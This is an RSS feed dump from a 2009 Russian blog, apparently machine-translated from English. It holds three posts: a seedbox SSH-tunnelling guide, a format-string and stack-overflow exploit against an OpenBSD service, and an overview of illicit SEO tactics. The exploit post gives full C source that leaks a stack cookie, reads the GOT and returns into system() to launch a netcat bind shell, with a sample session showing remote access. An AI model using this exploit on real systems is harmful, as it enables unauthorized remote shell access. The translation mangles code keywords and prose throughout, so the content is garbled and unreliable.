 Так что у вас есть он – большой черный ящик создан связи с корневой @ yourbox и курсор. Следующее, что нужно сделать было бы установить все программное обеспечение, необходимое для P2P через арендованные сервера. К счастью, это стало слишком легко теперь с пакетом инструментов управления, требующие 0 конфигурации или компиляции. Ubuntu имеет ням и APT-GET для покрытия базы, установка так же просто, как обновить ням, ням затем установить вещи или APT-GET обновления, а затем APT-GET установить вещи. Некоторые первоначальные конфигурации, скорее всего, потребует редактирования конфигурационных файлов, так как познакомиться с VI / нано редакторов или прыгнуть в установке Midnight Commander, в кв-получать обновления, а затем обновить APT-GET установить MC. МК в минималистском Ncurses интерфейс поможет вам просмотра файловой системы, а также редактирования файлов. 
 1) Перейдите в / ETC / SSH и sshd_config открыть для редактирования, на данный момент только изменения (добавьте, если отсутствует) следующие права после GSSAPI варианты: X11Forwarding да и AllowTcpForwarding да, после этого сохраните файл и выполните / и т.д. / init.d / SSH перезапустите, выход из сервера сессии. 
 2) Далее в шпатлевка загрузить сохраненный надеяться сессии расширить SSH, X11 и выберите Разрешить пересылку X11, X11 выбора удаленной аутентификации протокола, как MIT-Magic-Cookie-1. Что это вовсе это дает какие-либо графического приложения, расположенные на сервере для запуска в рамках локального сервера X11. Windows людей без X11 удовольствия, возможно, захотите проверить “X11 Экспедирование над использованием SSH X-Deep/32 и PuTTY”. Существует, конечно, очень мало нужно для установки графических приложений с сервером, который предназначен для guiless, но шансы не каждый второй читатель настройки iptables как вручную, так что это только для того, чтобы сделать вещи простыми. 
 3) APT-GET установить iptables conntract libnetfilter-conntrack1 firestarter помогут с получением окно заблокировано вниз перед дальнейшей настройки не происходит. После установки запустить firestarter, что если бы все было настроено нормально начнем с использованием локального сервера X11. 
 3.1) Политика въездному – разрешить соединения от хоста = добавить ваш IP-клиент, которая будет проходить потоки. В случае, если вы произошло иметь динамический IP, получить одну из свободных DNS служб иметь указатель на вас и ввода DNS имя вместо IP адреса. Кроме того, позвольте добавить сервис – 36881-36889 порты – все, и несколько других портов на torrentflux. 
 3.2) Изменение предпочтений – под интерфейс> События = Включить все opitons; рамках политики позволить все варианты; Firewall> фильтрация ICMP = пометить флажок для позволить МКЛПБ фильтрации; Firewall> ГС Фильтрации = знак включено, для серверов И X Window, приоритетности для Пропускная; Firewall> Advanced Options> знак падения молча, и проверить все, что ниже. 
 4) Изменить / ETC / hosts.deny для всех: ВСЕ, а затем / ETC / hosts.allow, чтобы все: YOURPUBLICIP ВСЕ: PRIVATEIPOFYOURCLIENT. 
 5) APT-GET установить Xinetd. 
 6) APT-GET установить mysql_server apache2 php5 php5-MySQL torrentflux PhpMyAdmin кальмаров Данте-сервер. 
 7) Отредактируйте / ETC / MySQL / my.cnf иметь key_buffer, max_allowed_packets, thread_stack, query_cache_limit установлен на 128K И query_cache_size установлен в 1 Мб. 
 7.1) / и т.д. / init.d / MySQL и затем начать mysql_secure_installation устранения testdb и пользователей доступа к таким, имея корни входа дистанционно запрещено. Установка корневого пользователя, не является очень хорошей идеей. 
  Изменить / etc/apache2/apache2.conf иметь StartServers, MinSparseServers установлен в 1 и MaxSparseServers установлен на 2 с maxclients = 10. 
 8.1) / etc/init.d/apache2 перезагрузить. 
 9) Создание БД для torrentflux в PhpMyAdmin и импорт / USR / доли / DOC / torrentflux / dbfiles / mysql.gz там. 
 9.1) Chmod-R 777 / VAR / кэш / torrentflux. 
 10) Отредактируйте / ETC / danted.conf включить>> клиенту проходить от YOURPUBLICIP (/ 0 порт 1-65535 к 0.0.0.0 / 0). 
 11) Отредактируйте / ETC / кальмар / squid.conf включить (справа ниже всех SRC ACL) ACL Tor SRC YOURPUBLICIP, затем вниз по http_access, когда вам нужно добавить http_access позволить Tor. [Примечание качестве альтернативы кальмар, только падение одного из прокси-сервер на PHP скрипты на WWW / HTML каталог Apache] 
 12) И, наконец изменить в / ETC / SSH / sshd_config, добавьте порт 443 под 22, Добавить GatewayPorts да под AllowTcpForwarding да, а также изменения к KeepAlive да. Установить Протокол 2, UsePrivilegeSeparation да, да StrictModes, удалите символ # (раскомментировать) от начала линии AuthorizedKeysFile, ChallengeResponceAuthentication да, PasswordAuthentication нет, UsePAM да. 
 13) Далее создания общественных / частных ключей на стороне клиента, в результате вы будете иметь / Home / someuser / .ssh / id_rsa И id_rsa.pub. 
 14) на сервере, не создавать корневой пользователь через useradd (не забудьте использовать флаг домой реже), перейдите в / главная / пользователей / .ssh и запустить связь authorized_keys. 
 15) С клиентской стороне перспективе SCP / Home / someuser / .ssh / id_rsa.pub ipoftheserver: / Главная / пользователь / .ssh, затем один сервер сделать кота id_rsa.pub>> authorized_keys. 
 16) APT-GET установить logwatch. Изменить / ETC / logrotate.conf включить в день вместо еженедельных, поворота 1, компресс. Перезагрузите сервер. 
 После перезагрузки / с учетом того, что все конфиги разработаны ОК / такого сервера будет Squid в качестве прокси-сервера для обозревателя Данте и могут быть использованы в качестве SOCKS4 сервер. Они являются хорошими для обмена между несколькими людьми, чтобы не транслировать реальные IP-адреса к роиться / Tracker. Кодировка от клиента стороной через autossh в виде: 
 autossh-М 40511:40522-I / Home / localclientuser / .ssh / id_rsa -2-R 36881: локальный: 36881-R 36882: локальная : 36882-R 36883: локальный: 36883-R 36884: локальный: 36884-R 36885: локальный: 36885-R 36886: локальный: 36886-R 36887: локальный: 36887-R 36888: локальный: 36888-R 36889: локальный: 36889-D-N 9920-р Т-443 nonrootuserattheserver @ serverip   
 Если Вы хотели бы (и вы) использование зашифрованных добавить кальмары-L 3128: serverip: 3128 сразу же после последнего R переключиться выше. Изменить браузеры имеют преференции по доверенности, указанной в качестве локального: 3128, отредактируйте ваш любимый клиент BitTorrent [потоп!] Конфигурацию использовать socks5 прокси на 127.0.0.1:9920 и порты 36881-36889 для общения. Наконец, не забывайте о torrentflux как средство загрузки непосредственно арендуемые сервера:) Таким образом, использование пропускной способности не ограничивается вашим клиентом линии загрузить / скачать предел. Используйте любой ПКП или Rsync передавать файлы на сервер. Еще одним способом увеличения свободного пространства непосредственно на сервере, будет расти примерно FTP доли от клиента к серверу, но опять эта связь может быть ограничение скорости в клиенте. 
 Такая установка имеет много заявок, и будет обходить различные ограничительные меры. Как и большинство сегодняшней конфиденциальности мер он не является совершенным, но оно будет способствовать, по крайней мере в некоторой степени. По сравнению с доступными zeroconfig услуг, он может сначала показаться более сложным в настройке, но в реальности она занимает около 40mins делать все это с нуля, и это еще дешево по сравнению с другими коммерческими установок особенно если распределяются между несколькими людьми. Ohh да и добро пожаловать обратно Demonoid! 
   
linuxexposed.com
]]>
			http://fvsd.ru/2009/06/20/torrenty-i-ssh-tunnel/feed/
		0
		
		
		
		http://fvsd.ru/2009/06/20/proverka-http/
		http://fvsd.ru/2009/06/20/proverka-http/#comments
		Sat, 20 Jun 2009 02:47:47 +0000
		admin
				
		
		

		http://fvsd.ru/2009/06/20/proverka-http/
		
			Есть множество причин, вы можете проверить  HTTP  при отладке проблем. Если вы когда-нибудь для отладки проблем, связанных с сессиями, печенье, или редиректов, я уверен, вы можете оценить, насколько сильно это без проведения пристально взглянуть на  то, что происходит за кулисами.
 Есть много инструментов, чтобы помочь Вам проверять HTTP. Если вы  Firefox  пользователь, вы можете использовать  LiveHTTPHeaders  или  HttpFox . (Пожалуйста, не стесняйтесь предложить другие.) Если вы используете  Сафари , вы можете позволить отладочного меню: 

 INT myexit  ( * Текст символ )   (   printf   (# ) (  "% S   N " , текст )    выход    (   -1  )  )  INT основной  ( INT argc, символ * argv  [ (# )]  )   ( sendbuf символ  [ BUFFSIZE ] ; recvbuf символ  [ BUFFSIZE  ] ; структуры sockaddr_in адрес; структуры sockaddr клиента; INT addrlen =   sizeof    ( клиент ) ; mysocket INT, S, Res; memset  ( И клиент,  0 ,   sizeof    ( клиент )  (# )) ; memset  (  ( символ * )  И адрес,  0 ,   sizeof    ( адрес )  ) ; mysocket = розетка  ( AF_INET, SOCK_STREAM,  0   )  , если   (! mysocket )  myexit  (  "Не по сокет"   ) ; address.sin_family = AF_INET; address.sin_addr.s_addr = INADDR_ANY; address.sin_port = htons  (  15001  )  , если   (  0 ! = связывания  ( mysocket,  ( структуры sockaddr * )  И адрес, (# )  sizeof    ( адрес )  )  )  myexit  ( (# ) "Не по связывать"  )  , если   ( слушайте  ( mysocket, MAXCONNECTIONS ) ! =  +0  )  myexit  (  "Не по слушать"  ) ;   printf ( #)   (  "Слушать на Socket   N "  ) ; S = согласиться  ( mysocket ,  ( структуры sockaddr * )  И клиент, И addrlen )  , если   ( == S  -- 1  )  myexit  (  "Не согласиться на"  )  , а   (( #)  0 ! = Recv  ( S, recvbuf, BUFFSIZE,  0  )  )   (    sprintf    ( sendbuf, recvbuf )  , если   ( отправить ( #) ( S, sendbuf, BUFFSIZE,  0  )  ==  -1  )   ( myexit  (  "Не отправлять данные   N "  )  )  ) (# ) у  ( S ) ; закрыть  ( mysocket )   возвращение  )   Основная идея здесь заключается в том, что мы используем formatstring прочитать информацию о том, что нам нужно знать, чтобы построить успешную эксплуатацию. Нам нужно несколько вещей, как вы увидите в эксплуатацию себя. Для того, чтобы не сделать этот документ слишком длинный, я сделал много из разъяснения в виде комментариев рядом с кодом сам.  Мы в первую очередь необходимо выяснить несколько компенсирует эти смещения используются в formatstring параметру $ прочитать слово на стеке. Мы потом использовать смещения мы собрались для того, чтобы читать, в порядке, stackcookie и хранить framepointer. Когда мы имеем stackcookie можно переполнения буфера при этом оказались в ProPolice, а с сохраненной framepointer, мы можем получить представление о том, где на стеке нашего буфера существует.   Сейчас мы должны знать, где мы хотим, чтобы отвлечь исполнение, здесь мы хотим, чтобы система вызова (), libc отображается на случайных местоположение, чтобы мы не знаем, где можно прыгать, однако Глобальной Офсетные Таблица содержит адреса отображается функций. Проблема заключается в том, что наши уязвимые программы не используют системы (), поэтому его адрес обыкновение быть решены нашу программу, и, следовательно, не будут существовать в GOT.  Однако мы знаем, что printf () используется, и поэтому существует в GOT с отладкой мы знаем, что на третьей позиции. И мы можем вычислить смещение между printf () и системы (), эта величина, конечно, могут переключиться между системами, но OpenBSD очень стабильная ОС, поэтому достаточно стабильным. Поэтому мы используем formatstring-ошибке следующего третьего GOT въезда, а затем мы вычислить адрес системы (), и, хотя мы на это мы вычислить адрес для выезда (), а, только для того, чтобы дать нашим эксплуатировать приятный чистый выход.   Сейчас у нас всю информацию, что мы должны построить использовать строку. Он будет выглядеть следующим образом:   

)  |   выход    ( )  | адрес команды |  недействительными  |  / / / Команда | нулевой |    Если команда командной строки мы хотим послать системе (). Потому что мы точно не знаем адрес нашей строки, мы будем использовать несколько '/' в качестве одной из форм NOP-салазкам.  Поскольку мы смогли направить нулевых байтов мы могли бы также создать два Ницца нуль-строки, оканчивающиеся один с нашим переполнения данных, одна из наших команд должен быть казнен. При этом вместо tacking нашей команды в конце первой строки мы гарантируем, что мы не пишем слишком далеко в стеке, где мы могли бы хит-то важное, как, например, $ SHELL переменные среды.   А теперь пример сессии:    @ chris_fs Kubuntu: $ uname-SR Linux  2.6 

 .0   .88  Наиденно цели по смещению буфера:  20  , поиск  на  в отставке ... Найдено по смещению:  539  Ret: 0x1c0006c0, Frame: 0xcfbdc1bc, Cookie: 0x7e4d3594 Адрес   printf    ( ) (# ): 0xa385514,   система    ( ) : 0xa377570,   выход    ( ) : 0xa3a788c chris_fs @ Kubuntu: $ netcat  192,168   .0   .88   1234  uname OpenBSD-SR  4.2    выход   @ chris_fs Kubuntu :$ А вот код:    # включить "система / types.h "  # включить" систем / socket.h "  # включить" netinet / in.h "  # включить" stdlib.h "

  # включить "string.h"   # определить BUFFSIZE 1024   # определить MAXSPLITS 100   # определить GOTADDR 0x3c002148   / / OpenBSD 3.9   / / # определить SYSTEMOFFSETFROMPRINTF 57076   / / # определить EXITOFFSETFROMPRINTF -150100   / / OpenBSD 4.2 (# )  # определить SYSTEMOFFSETFROMPRINTF 57252   # определить EXITOFFSETFROMPRINTF -140152  символ * расщепляется  [ MAXSPLITS ] ; символ команды  [ ]  =  "/ USR / местное / BIN / netcat-L-P 1234-е / бен / ш" ; INT myexit  ( * символов текста (# ))   (   printf    (  "% S   N "  , текст )    выход    (  -1  )  )  длинная readhex  ( * ул символ )   ( неподписанными длительную кадра =  0 ; символ hexaddr  [(# )  11  ]  =  "0x" ; strncpy  ( hexaddr  2 , ул,  8  ) ; кадра = strtoul  ( hexaddr,  0 ,  16  )   вернуться   ( длинная )  рамка )  недействительными writeaddress  ( символ * буфер, беззнаковое INT адрес )   ( INT I;  на   ( I =  0 ; I < 4 , я ++) ( #) буфера  [ и ]  =  ( символ )   ( адрес >> ((# ) я *  8  )  )  И 0x000000ff; )  недействительными sendrecv  ( символ * буфер, INT носок, INT LEN )   ( INT байт =  ( == Len  0  ) ?   Strlen    ( буфера ) : Len , если   (  (( #) байт = отправить  ( носок, буфер, байт,  0  )  )  ==  -1  ( #))  myexit  (  "Ошибка при отправке ()  N "  ) ; байт =  0 ( #); memset  ( буфера,  0 , BUFFSIZE )  , если   (  ((# ) байт = Recv  ( носок, буфер, BUFFSIZE,  0  )  )  ==  -1  (# ))  myexit  (  "Ошибка на Recv ()  N "  )  )  недействительным   сплит    ( * буфер символ, символ ** расщепляется )   ( символ * P =  0 ; INT I =  0 ; memset  ( распадается,  0 , MAXSPLITS *  4  ) ; P =  ( символ * )    strtok    ( буфера,  ""  (# ))  , а   ( П И И  ( I < ( MAXSPLITS  -1   )  )  )   ( расщепляется  [ Я ++]  = P, P =  (  символ * )    strtok    (  0 ,  ""  (# ))  )  )  INT поиска  ( INT запуска, INT   Макс  , символ * колодки , Const символ * матче, INT носок )   ( INT I; символа буфера  [ BUFFSIZE ]   на   ( I = начало; I <  Макс  , я ++)   ( snprintf  ( буфером, BUFFSIZE,  "% S%%% I $ X" , колодки, я ) ; sendrecv  ( буфера, носок,  0 (# ) )  , если   (   strncmp    ( буфера, матч,   strlen    ( матч )  )  ==  0  )  (# ) возвращение  и )   возвращение   -1  )  INT основной  ( INT argc, символ * argv  [ ]  )   ( INT mysocket =  0 , Res =  0  , I =  0 , cookieoffset =  0 , колодки =  0 ; INT targetbufferoffset =  0 , retoffset =  0 (# ), в отставке =  0 ; INT J =  0 ; неподписанными INT * bufferptr =  0 ; неподписанными INT маркеры =  0 , кадр =  0 ,   кол   =  0 ; неподписанными INT exitaddr =  0 , systemaddr =  0 (# ); структуры sockaddr_in адрес; символ буфера  [ BUFFSIZE ]  , если   ( argc! =  2  (# ))  myexit  (  "Использование:. / эксплуатировать целевой IP   N "  )  , если ( #)  (!  ( = mysocket розетка  ( AF_INET, SOCK_STREAM,  0  )  ) ( #) )  myexit  (  "Не удалось создать сокет   N "  ) ; memset  (  ( символ * )  И адрес,  0 ,   sizeof    ( Адрес )  ) ; address.sin_family = AF_INET; address.sin_port = htons  (  15001  ) ; адрес . sin_addr.s_addr = inet_addr  ( argv  [  1  ]  ) ; Res = соединение  (  mysocket,  ( структуры sockaddr * )  И адрес,   sizeof    ( адрес ) ( #) )  , если   ( Рез! =  0  )  myexit  ( ( #) "Невозможно подключиться   N "  )   / / По prepending ABAB в нашем поиске и сравнении ABAB424142414241   / / мы имеем возможность для поиска начать наш буфер. Мы знаем   / / смещение к использованию, если привязки данных, на наш буфер в дальнейшем зондов  I = Search  (  1 ,  300 ,  "ABAB" ,  "ABAB42414241" , mysocket ) ; targetbufferoffset = I , если   ((# ) targetbufferoffset < 0  )  myexit  (  "Не удалось обнаружить targetbuffer компенсированы   N "   )    printf    (  "Найдено цели по смещению буфера:% I, ищет в отставке ...", я ) ; memset  ( буфера,  0 , BUFFSIZE )   / / хорошо сейчас мы нуждаемся в stackcookie, мы находим его Сразу после нашего буфера 2   / / 2048 байт = 512 слов, и мы также прочитать хранящиеся framepointer   / / мы кричим на маркеры и следующие 39 байта от стека  cookieoffset = targetbufferoffset +  512   на   ( I =  0 ; I < 40 , я ++ )   ( Res + =   sprintf    ( + буфер Рез,  "%%% I $ X" ( #), cookieoffset + I )  )  sendrecv  ( буфера, mysocket,  0  )  (# )  сплит    ( буфер, разделил ) ; маркеры readhex =  ( расщепляется  [  0  ]  )   / / Теперь мы пытаемся найти наш адрес возврата мы рассчитываем на то, перспективных   / / как обратный адрес, и если слово, прежде чем оно выглядит как   / / framepointer, мы надеемся, право   на   ( I =  0  ; I < 40 , я ++)   ( , если   (  (   strncmp    ( расщепляется  [ и ] ,  "МВ" ,  2 (# ) )  ==  0  )  И И  (   strncmp    (( #) расщепляется  [ I  1  ] ,  "1c00" ,  4  ) (# ) ==  0  )  )   брейк  )  , если   (  I ==  40  )  myexit  (  "не может найти адрес возврата   N "  ) ; retoffset = cookieoffset + I  1 ; кадра = readhex  ( расщепляется  [ и ]  (# )) ; отставке = readhex  ( расщепляется  [ I  1  ]  )  (# )  printf    (  "найден по смещению:% I   N " , retoffset ) ;   printf    (  "Ret: P%," , в отставке )    printf    (  "Frame:% P," , рамка )    printf   ( #) (  "Cookie:% P   N " , маркеры )   / / хорошо мы получили то, что мы нуждаемся в стека, времени для GOT записи  memset  ( буфера,  0 , BUFFSIZE ) ; snprintf  ( буфера, BUFFSIZE, ( #) "%%% I $ S" , targetbufferoffset  2  )   / / Lucky для нас, мы можем отправить нулевой байт, OBSD Devs делать все, чтобы сделать его   / / сложнее взломать, GOT таблице содержатся адреса nullbyte - перейти цифра.   / / Третий элемент printf (), поэтому мы добавляем 12 байт на наш адрес  writeaddress  ( буфера  8 ,  ( GOTADDR  12  )  ) ; sendrecv  ( буфера, mysocket,  13  ) ; bufferptr =  ( INT * )  буфера;  ( #) кол   = * bufferptr;  / / Если мы не повезло, libc отображается на адреса, содержащие 0x00  , если   ( ( #) (   кол   >> 24  )  ==  0  ) (# ) myexit  (  "повезло libc адрес содержит NUL-байт   N "  )   / / Теперь, когда у нас есть адрес printf, мы можем вычислить отдыха  systemaddr =   кол   - SYSTEMOFFSETFROMPRINTF; exitaddr =   кол   - EXITOFFSETFROMPRINTF; (# )  printf    (  "Адрес printf ():% P" ,   кол   (# ))    printf    (  ", система ():% P" , systemaddr )    printf    (  ", выход ():% P   N " , exitaddr )   / / хорошо сейчас у нас есть все информация нам нужна, чтобы написать эксплоит строки   / / Если мы предоставляем полную строку мы нуждаемся 1024 + маркеры ...  0  memset  ( буфера,  0 , BUFFSIZE ) ; strncat  ( буфера,  "% .1024 U" , BUFFSIZE ) ; bufferptr =  ( INT * )   ( + буфер   strlen    ( буфера )  ) ; writeaddress  (  ( символ * )  bufferptr + +, маркеры  )   / / Добавить stackcookie   / / Мы добавляем мусора на пространстве между маркеры и в отставке  колодки = retoffset -  ( cookieoffset  1  )    printf    (  "  N  Pad:% I   N  ", колодки )   на   ( I =  0 ; I <колодки; I + + (# ))   ( writeaddress  (  ( символ * )  bufferptr + +, 0xAAAAAAAA )   )  writeaddress  (  ( символ * )  bufferptr + +, systemaddr )   / / Добавить система () (# ) writeaddress  (  ( символ * )  bufferptr + +, exitaddr )   / / Добавление выхода () (# ) / / Добавить в адрес нашей системы () Строка, здесь мы угадать основанный на   / / хранится framepointer мы retreived ранее, мы должны в наших земель салазок  writeaddress  (  ( символ * )  bufferptr + +, рамка  -1650  )   / / Добавить указателя   / / Заполнить буфер с нашей "NOP-салазкам", и добавить нашу команду для системы () memset  ( + буфер   strlen    ((# ) буфера )   1 , '/',  800  ) ; strncat  ((# ) буфер +   strlen    ( буфера )   1 , команда,   strlen (# )   ( командой )  ) ; sendrecv  ( буфера, mysocket, BUFFSIZE )  (# ) / / Закрыть соединение, ссылаться в отставке -> наш код  закрыть  ( mysocket )   возвращение   0   )     Есть еще три (две реально) жестко ценностей в эксплуатации, которые могли бы предотвратить атаки работать на вашей системе, во-первых, GOT адрес. Второй и третий являются offsetvalues, которые мы используем для расчета смещаться printf (), чтобы система () и выход (), SYSTEMOFFSETFROMPRINTF и EXITOFFSETFROMPRINTF.   Эксплоита можно улучшить на поиск, и найти эти ценности, а, однако, поскольку я слишком ленив, и это лишь доказательство концепции Я жестко ценностей. Таким образом, вы, возможно, придется изменить эти значения, чтобы он работает на вашей системе.   Если вы хотите получить эксплуатируют работающих на вашей системе, но не знаю, каким образом вы можете следить за указателями ниже [2].   Chris_fs@hushmail.com    [1]  Очень прохладный эксплуатировать на infamous41md, которая использует аналогичные методы в другом направлении.   http://web.archive.org/web/20051121201432/http://infamous.hackaholic.org/imapslap.cc.gz    [2]  Для получения GOT адрес вашего vuln ок, просто запустите:    objdump-ч vuln | grep получил    и записать адрес Организации. получили сегмент   Если вы не знаете, как вычислить смещение для SYSTEMOFFSETFROMPRINTF и EXITOFFSETFROMPRINTF можно обобщить ниже код и выполнить его так: . / getoffset printf система . / getoffset printf выхода ( #) , вы должны изменить строку: # определить LIBC "/ usr/lib/libc.so.41.0" в матче с libc файла в вашей системе. Теперь после того, как вы правильно значения для GOT, SYSTEMOFFSETFROMPRINTF и EXITOFFSETFROMPRINTF просто изменить значения в эксплуатацию и перекомпилировать. Удачи!    # Включить    # включить    # определить LIBC "/ usr/lib/libc.so.41.0"  INT exiterror  ( * Текст символ )   (   printf    ( текст 

 "Использование:. / прог function1 function2   N < dlfcn.h > " ) < stdio.h >  / / Получить ручку слишком libc  ручкой = dlopen  ( LIBC, DL_LAZY (# ))  , если   ( == ручку  0  )   возвращение  exiterror  (( #)  "Не по dlopen ()  N "  ) ; FP = dlsym  ( ручкой, argv  [(# )  1  ]  ) ; fp2 = dlsym  ( ручкой, argv  [  2  ]  )  , если   ( FP ==  0  )   вернуться  exiterror  (  "Ошибка при обнаружении первой функции   N "  )  , если   (  fp2 ==  0  )   возвращение  exiterror  (  "Ошибка при обнаружении второй функции   N (# ) " )    printf    ( " адрес libc% S ():% P   N  ", argv  [  1  ] , FP )    printf ( #)   (  "адрес libc% S ():% P   N " , argv  [  2  ] , fp2 )    printf    (  "Смещение:% I   N  ",  ( INT )  FP -  ( INT )  fp2 )  )       Статья: Chris_fs      

linuxexposed.com
]]>
			http://fvsd.ru/2009/06/20/formatstrings-i-openbsd/feed/
		0
		
		
		
		http://fvsd.ru/2009/06/20/ilegal-seo-texnologij/
		http://fvsd.ru/2009/06/20/ilegal-seo-texnologij/#comments
		Fri, 19 Jun 2009 21:03:27 +0000
		admin
				
		
		

		http://fvsd.ru/2009/06/20/ilegal-seo-texnologij/
		
			 Когда SEO профессиональных указывает на то, что он или она будет безопасной входящие ссылки для вас, попросите их рассказать вам, как конкретно они будут делать это. Правильный ответ состоит в том, что они будут конкретные, уже существующие и создали  веб-сайты для получения входящего ссылке из них к вам (в большинстве случаев без ссылки на них). Если вы профессиональный рассказывает, что они будут строить вам сотни и тысячи страниц в различных областях, что будет ссылка на ваш сайт, не работают с ними, как это будет жестоко калечат вашего сайта. 

 
  
 Также периодически поиск доменных имен в основных поисковых системах, чтобы посмотреть, какие объекты должны быть для вас. Если вы видите что-либо из простых, таких как веб-сайты, чьи домены очень долго или тарабарщина (много чисел и случайных или неуместные слова) или страниц, которые являются просто длинный список ссылок, ваш подход SEO профессионально о том, как Ваш сайт удален из этих страниц и узнать, как они появились здесь в первую очередь. 
  LINK ферм  
 также известен как Spamexing или Spamdexing. 
 Ссылка ферма представляет собой серию сайты создаются исключительно для строительства жилья на безвозмездной основе ссылки, указывающие на коллекцию сайтов. Оно может быть также сеть веб-сайтов, взаимодействие друг с другом. 
 Такие сайты считаются незаконными с точки зрения Google, и крупные поисковые системы, поскольку они направлены на достижение высоких рейтингов для сайтов, которые не заработали этих рейтингов на основе разумного содержания и общего качества. 
 В качестве стратегии, используя ссылку хозяйств, или spamdexing поисковой системы, это очень опасно. 
 Даже если ваш сайт имеет большое содержание, если вы или ваш SEO консультант использовать эту технику, ваш сайт будет по-прежнему получать наказание или запрещены, потому что двигатели цифру, что если у вас есть хорошее содержание вас не будет прибегать к таким скрытую тактику, направленных на их уловки.  
  Входные страницы  
 также известен как рекламные страницы Перейти страницы Gateway страницы и т.д. 
 Вход Страницы форме целевых страниц, который предназначены исключительно для поисковых систем, и зачастую даже не просматриваться человека посетитель. На этих страницах часто используют перенаправление скрипт, который автоматически указывает посетителя на другую страницу веб-сайта без прав посетитель никогда видим дверной странице. Это также известная как клоакинг и четко определено в качестве незаконной практики в Google и других поисковых системах. 
 Единственный раз, когда целевая страница является приемлемым поисковых машин, если она находится в форме информативный, хорошо написана статья о том, что права посетителей читать и наслаждаться, если они не обманули на кнопку или перенаправлены на Сайт основной страницы.  
  Наполнение ключевыми словами  
 Одна из первоначальных незаконные методы SEO, наполнение ключевыми словами, когда вы загружаете страницу полный определенным ключевым словам, ни в мета-теги, другие скрипт-теги или в само содержание. 
 Это отличается от оптимизации страницы по определенным ключевым словам, так же слова повторяются десятки или сотни раз нет доверия или информативный способ. 
 Ключевые слова скрыты несколькими способами, например, некоторые люди будут делать в тексте того же цвета, как фон так поисковики увидеть его, но нет посетителей может. Другие скрыть ключевые слова-теги в сценарий. Но пока другие будут использовать CSS позиционировать ключевые слова, за ваши видна область экрана, опять же, чтобы ни один человек посетители могут увидеть, – но поисковики могут.  
 Хотя на поверхности, с использованием таких методов, как может показаться привлекательной идея. Тем не менее, поисковые машины могут определить ключевые слова, которая используется надлежащим образом и будут наказывать или запрет на своем сайте с помощью любой из вышеперечисленных методов вещи ключевые слова в ваш сайт. 
  Скребковые страниц  (# ) Также известен как Авто Сгенерирована страницы. 
 Скребковые страниц состоит из тех, результаты поиска или содержимое автоматически извлекается из десятков или сотен веб-сайтов и поисковых системах результаты. Это является одной из форм плагиата, как никакая часть скребка страница исходное содержание. 
 Чаще всего, такие сайты используются для показа объявлений Google Adsense или другие объявления, которые оплачивает владелец сайта каждый раз, когда пользователь нажимает на нее. Однако поисковые системы получили очень хорошие на запрещение таких объектов с их результатами и прав посетители могут легко обнаруживать их, как хорошо. 
 Скребковые сайты легко обнаружить, поскольку они в значительной мере нелогично. Они фрагменты других содержимое веб-страницы или результаты поиска, и, следовательно, не имеют разумной точке и не имеет смысла, если их читать. 
 
linuxexposed.com
]]>
			http://fvsd.ru/2009/06/20/ilegal-seo-texnologij/feed/
		0